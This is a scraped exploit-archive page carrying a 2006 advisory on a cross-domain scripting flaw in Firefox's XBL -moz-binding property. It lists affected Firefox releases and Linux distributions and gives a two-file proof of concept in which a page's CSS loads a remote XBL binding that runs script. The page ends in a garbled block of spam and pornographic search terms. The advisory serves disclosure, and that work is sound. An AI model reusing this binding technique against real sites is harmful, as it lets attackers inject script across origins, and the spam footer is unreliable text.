exploits , vulnerabilities , articles , Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability
| Title |
Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability |
| Published |
2006-01-30-12:00AM |
| Updated |
2006-01-30-09:09PM |
| Class |
Origin Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
Reported by Chris Thomas (CTho) <cst@andrew.cmu.edu>. |
| Vulnerable |
Mozilla Firefox 1.5 beta 2
Mozilla Firefox 1.5 beta 1
Mozilla Firefox 1.5
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
Gentoo Linux
Mozilla Firefox 1.0.2
MandrakeSoft Linux Mandrake 10.2 x86_64
MandrakeSoft Linux Mandrake 10.2
RedHat Desktop 4.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux AS 4
Mozilla Firefox 1.0.1
RedHat Fedora Core3
Mozilla Firefox 1.0
Gentoo Linux
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux current
|
| Not Vulnerable |
|
| Code |
The following proof of concept examples are available:
http://domain1/path/to/page.html :
<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>
http://domain2/path/to/xbl.xml :
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>
https://bugzilla.mozilla.org/attachment.cgi?id=209241
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 01:25:25 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.Indian Www.Aishwa www.q031.c f tv sex v www.tokyo- Photos of gpcodes hot,girls. Reverse www.yd10.c PHP Advanc invisio sexvedios news for c 200 /compo phplinks 200 /compo sex animal maxcpm.inf FJGFJ search/exp www.89.cmm www.gujili Www.tamila Indian por ArticleBea WWW.HOT+GI download v String+sex sacura sex php-nuke 2 php-nuke 2 23sex chat room sex.conm www.jeepin news for c file injet www.abaoxi cisco+cata http:www.s php-nuke 2 changsha.k www.12cr1m php-nuke 2 championna news for c linux 2.4. www.sjsch. WWW.1017la
|
